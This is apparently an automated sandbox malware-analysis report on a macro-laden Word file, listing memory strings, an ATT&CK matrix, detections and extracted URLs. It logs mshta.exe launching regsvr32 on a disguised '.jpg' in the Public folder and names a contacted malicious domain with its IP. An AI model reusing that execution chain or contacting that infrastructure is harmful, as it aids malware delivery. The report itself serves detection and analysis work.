Source: mshta.exe, 00000007.00000003.309220115.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309451099.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310098370.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000002.312858088.0000000009F0F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWAN Miniport (Network Monitor)-WFP Native MAC Layer LightWeight Filter-0000T?
Source: WINWORD.EXE, 00000001.00000002.569213146.000000000CFF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.568255480.000000000B290000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.569111011.000000000CFC2000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309220115.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309451099.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310098370.0000000009F0F000.00000004.00000001.sdmp, mshta.exe, 00000007.00000002.312858088.0000000009F0F000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW_
Source: mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW`
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXECode function: 1_2_0CC8E968 LdrInitializeThunk,
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" c:\users\public\dowNext.jpg
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmpBinary or memory string: Program Manager
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmpBinary or memory string: Progman
Source: WINWORD.EXE, 00000001.00000002.563865384.0000000001A90000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.563580542.0000000000F60000.00000002.00020000.sdmpBinary or memory string: Progmanlock
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\SysWOW64\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents
Source: C:\Windows\SysWOW64\explorer.exeDirectory queried: C:\Users\user\Documents

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting12DLL Side-Loading1Process Injection12Masquerading1OS Credential DumpingQuery Registry1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemorySecurity Software Discovery1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Local System1Automated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting12NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol12SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery11SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
charge_12.01.2021.doc30%ReversingLabsScript-Macro.Trojan.Heuristic
charge_12.01.2021.doc100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://settings.outlook.comS0%Avira URL Cloudsafe
http://winrentals2017b.com/0%Avira URL Cloudsafe
https://api.aadrm.com/0%URL Reputationsafe
https://substrate.office.comgz0%Avira URL Cloudsafe
https://api.office.nets?0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://substrate.office.comm0%Avira URL Cloudsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
https://cortana.ai:$0%Avira URL Cloudsafe
https://api.onedrive.comcent0%Avira URL Cloudsafe
https://devnull.onenote.comedOw0%Avira URL Cloudsafe
https://substrate.office.comc0%Avira URL Cloudsafe
https://ncus.contentsync.0%URL Reputationsafe
https://substrate.office.comL0%Avira URL Cloudsafe
https://substrate.office.comP0%Avira URL Cloudsafe
https://wus2.contentsync.0%URL Reputationsafe
https://api.cortana.aiD#0%Avira URL Cloudsafe
https://www.odwebp.svc.msom0%Avira URL Cloudsafe
https://outlook.office.com70%Avira URL Cloudsafe
https://asgsmsproxyapi.azurewebsites.net/60%Avira URL Cloudsafe
https://outlook.office.com17690%Avira URL Cloudsafe
https://dataservice.o365filtering.com:7P0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
winrentals2017b.com
194.62.42.207
truefalse
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://shell.suite.office.com:14437CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
      		high
      https://autodiscover-s.outlook.com/WINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571452806.0000000010A0E000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415190999.0000000010A0A000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
        		high
        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
          		high
          https://cdn.entity.7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
          • URL Reputation: safe
          		unknown
          https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
            		high
            https://rpsticket.partnerservices.getmicrosoftkey.comWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
            • URL Reputation: safe
            		unknown
            https://lookup.onenote.com/lookup/geolocation/v1WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
              		high
              https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                		high
                https://settings.outlook.comSWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://winrentals2017b.com/mshta.exe, 00000007.00000002.312828178.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.310080125.0000000009EDF000.00000004.00000001.sdmp, mshta.exe, 00000007.00000003.309434578.0000000009EDF000.00000004.00000001.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyWINWORD.EXE, 00000001.00000002.569040396.000000000CF4F000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                  		high
                  https://api.aadrm.com/7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://substrate.office.comgzWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                    		high
                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppWINWORD.EXE, 00000001.00000003.292178195.00000000108E6000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmpfalse
                      		high
                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrbWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmpfalse
                        		high
                        https://api.microsoftstream.com/api/7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                          		high
                          https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                            		high
                            https://cr.office.comWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                              		high
                              https://api.office.nets?WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              https://login.windows.net/common/oauth2/authorizecGWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                		high
                                https://res.getmicrosoftkey.com/api/redemptioneventsWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                • URL Reputation: safe
                                		unknown
                                https://tasks.office.com7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                  		high
                                  https://officeci.azurewebsites.net/api/7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  https://login.windows.net/common/oauth2/authorize4EVWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                    		high
                                    https://login.windows.net/common/oauth2/authorizeN~WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                      		high
                                      https://login.windows.net/common/oauth2/authorize$WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                        		high
                                        https://login.windows.net/common/oauth2/authorize%WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                          		high
                                          https://store.office.cn/addinstemplateWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://login.windows.net/common/oauth2/authorizeqFWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                            		high
                                            https://store.office.de/addinstemplateZ;pWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                              		high
                                              https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechWINWORD.EXE, 00000001.00000003.292217767.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292507382.0000000010907000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417778990.0000000010906000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571343617.0000000010907000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                		high
                                                https://substrate.office.commWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.odwebp.svc.ms7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://api.powerbi.com/v1.0/myorg/groups7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                  		high
                                                  https://web.microsoftstream.com/video/7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                    		high
                                                    https://api.addins.store.officeppe.com/addinstemplate7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    https://cortana.ai:$WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		low
                                                    https://graph.windows.netWINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                      		high
                                                      https://analysis.windows.net/powerbi/apidIWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://login.windows.net/common/oauth2/authorizeA3VWINWORD.EXE, 00000001.00000003.417572350.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571214526.000000001087D000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292128544.0000000010877000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292417505.000000001087F000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://login.windows.net/common/oauth2/authorizecom7HQWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://api.onedrive.comcentWINWORD.EXE, 00000001.00000003.292622715.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.418070806.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571431149.00000000109D5000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292317254.00000000109D5000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://login.windows.net/common/oauth2/authorize/aWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://login.windows.net/common/oauth2/authorize5FWWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                		high
                                                                https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                  		high
                                                                  https://devnull.onenote.comedOwWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://substrate.office.comcWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://ncus.contentsync.WINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmp, 7CC1B43E-0D2C-47F4-8AD2-E8873A50A321.1.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://substrate.office.comLWINWORD.EXE, 00000001.00000003.292072618.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.292003000.0000000010B12000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000002.571677116.0000000010AF7000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.416908743.0000000010ADD000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.417045996.0000000010AF9000.00000004.00000001.sdmp, WINWORD.EXE, 00000001.00000003.415510836.0000000010ADD000.00000004.00000001.sdmpfalse
                                                                  • Avira URL Cloud: safe
